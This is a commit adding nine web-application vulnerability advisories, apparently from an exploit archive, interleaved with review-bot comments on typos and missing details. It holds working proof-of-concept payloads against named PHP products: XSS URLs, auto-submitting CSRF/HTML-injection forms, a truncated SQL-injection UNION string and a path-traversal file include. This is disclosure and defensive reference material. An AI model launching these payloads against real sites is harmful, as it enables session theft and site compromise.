Updated 09_14_2014

Offensive Security 2014-09-14 04:44:14 +00:00
parent 58cf70abfb
commit e2eef480e2
10 changed files with 143 additions and 0 deletions


@ -31179,3 +31179,12 @@ id,file,description,date,author,platform,type,port
34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 'search' Parameter Cross-Site Scripting Vulnerability",2010-09-06,"High-Tech Bridge SA",php,webapps,0
34629,platforms/php/webapps/34629.txt,"AContent 1.0 Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0
34630,platforms/php/webapps/34630.txt,"AChecker 1.0 'uri' Parameter Cross-Site Scripting Vulnerability",2010-09-15,"High-Tech Bridge SA",php,webapps,0
34631,platforms/php/webapps/34631.txt,"ATutor 1.0 Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0
34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 'search' Parameter HTML Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
34633,platforms/php/webapps/34633.txt,"Spiceworks 'query' Parameter Cross Site Scripting Vulnerability",2009-08-08,"Adam Baldwin",php,webapps,0
34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
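
Review bot: the description in the added row for 34634 reads "Multple I-Escorts Products", a typo for "Multiple" that will make the entry miss title searches; correct it before merging. The nine added rows also carry 2009 and 2010 values in the date column while the rows directly above them are dated 2014-09-11, so the commit message or the column documentation should say which date this column is meant to hold.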


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43237/info
Santafox is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Santafox 2.02 is vulnerable; other versions may be affected.
http://www.example.com/search.html?search=1"><script>alert(document.cookie)</script>&x=0&y=0
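
Review bot: the affected-version line says "Santafox 2.02" while the index row added for this file (34628) says "Santafox 2.0.2"; pick one spelling so version-based lookups match. The text also never names the vulnerable parameter, which is only visible in the sample URL (`search`); naming it in the description, together with the fix a maintainer should look for (HTML-encoding the value where it is echoed into the page), would make the entry usable for triage without reading the request.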

platforms/php/webapps/34629.txt Executable file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/43238/info
AContent is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
AContent 1.0 is vulnerable; prior versions may also be affected.
http://www.example.com/home/search.php?search_text=txt"><script>alert(document.cookie)</script>&catid=&search=Search
<form action="http://www.example.com/home/editor/edit_content.php?_cid=PAGE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="54" />
<input type="hidden" name="_cid" value="PAGE_ID" />
<input type="hidden" name="title" value="page title" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="alternatives" value="" />
<input type="hidden" name="current_tab" value="0" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="test_message" value="" />
<input type="submit" name="submit" id="sbmtit" value="Save" />
<input type="hidden" name="displayhead" value="0" />
<input type="hidden" name="displaypaste" value="0" />
<input type="hidden" name="complexeditor" value="1" />
<input type="hidden" name="title" value="atest ah" />
<input type="hidden" name="formatting" value="1" />
<input type="hidden" name="head" value="" />
<input type="hidden" name="uploadedfile_paste" value="" />
<input type="hidden" name="body_text" value='hello world html<script>alert(document.cookie)</script>' />
<input type="hidden" name="weblink_text" value="" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>
<form action="http://www.example.com/home/course/course_property.php?_course_id=COURSE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="COURSE_ID" />
<input type="hidden" name="title" value="Creating Lesson in AContent" />
<input type="hidden" name="category_id" value="0" />
<input type="hidden" name="pri_lang" value="en" />
<input type="hidden" name="description" value="Learn how to" />
<input type="hidden" name="copyright" value='1"><script>alert(document.cookie)</script>' />
<input type="submit" name="submit" id="sbmtit" value="Save" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>
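
Review bot: the file runs a reflected URL and two auto-submitting POST forms together with no labels, so a reader has to scan every field to find the injected ones (`search_text`, `body_text`, `copyright`). Add a one-line heading before each case naming the endpoint, the parameter, and whether it is the cross-site scripting or the HTML-injection issue from the description. Neither form carries a token field, so both cases depend on the endpoints accepting a cross-site POST; the description mentions only input sanitization, and that dependency should be documented because it changes what a fix has to cover.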

platforms/php/webapps/34630.txt Executable file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/43240/info
AChecker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
AChecker 1.0 is vulnerable; other versions may be affected.
<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value=&#039;http://1"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="validate_uri" value="Check It" />
<input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
<input type="hidden" name="uploadfile"; filename="" />
<input type="hidden" name="gid[]" value="8" />
</form>
<script>
document.main.submit();
</script>
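
Review bot: the `uri` input has its value delimited by `&#039;` entities instead of quote characters, and the `uploadfile` input reads `name="uploadfile"; filename=""`, which is multipart header syntax rather than an HTML attribute. Both look like conversion damage from the referenced source; re-import the body from that source rather than hand-editing it, so the archived text matches the advisory it cites.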

platforms/php/webapps/34631.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43241/info
ATutor is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ATutor 1.0 is vulnerable, other versions may also be affected.
http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43245/info
Multi Website is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Multi Website 1.5 is vulnerable; other versions may also be affected.
http://www.example.com/demo/?action=search&search=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&gateway=%E4%E3%D8+%C7%E1%C8%CD%CB&by=words


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43248/info
Spiceworks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Spiceworks 3.6.33156 and 4.1.39229 are vulnerable; other versions may also be affected.
http://www.example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43249/info
Multiple I-Escorts products are prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
I-Escorts Directory Script and I-Escorts Agency Script are vulnerable.
http://www.example.com/demos/escorts-agency/escorts_search.php => Your XSS
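
Review bot: the only technical line, `escorts_search.php => Your XSS`, names a script but no parameter, although the description says there are multiple issues across two products. Without the affected input names a maintainer cannot tell which fields need output encoding or write a matching detection rule; add them from the referenced source, and add the affected versions if the source gives any.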


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43254/info
Willscript Auction Website Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/webtrade/category.php?cate_id=-19%20union%20all%20select%201,version%28
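
Review bot: the sample URL ends at `version%28` with the parenthesis left open, so the last line appears to have been cut off during import; check it against the referenced source. The entry also lacks the "is vulnerable" version line that the other files in this commit include, which leaves readers unable to tell which releases are affected.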


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43259/info
NWS-Classifieds is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
NWS-Classifieds 007 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?cmd=../../../../../../../../windows/system.ini%00
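
Review bot: the sample request targets `windows/system.ini` and ends in `%00`, which implies a Windows host and an include that appends a suffix to `cmd`, but the description states neither condition. Document both so readers know when the issue applies, and note the remediation a maintainer should check for: `cmd` mapped to a fixed allowlist of page names instead of being used as a path.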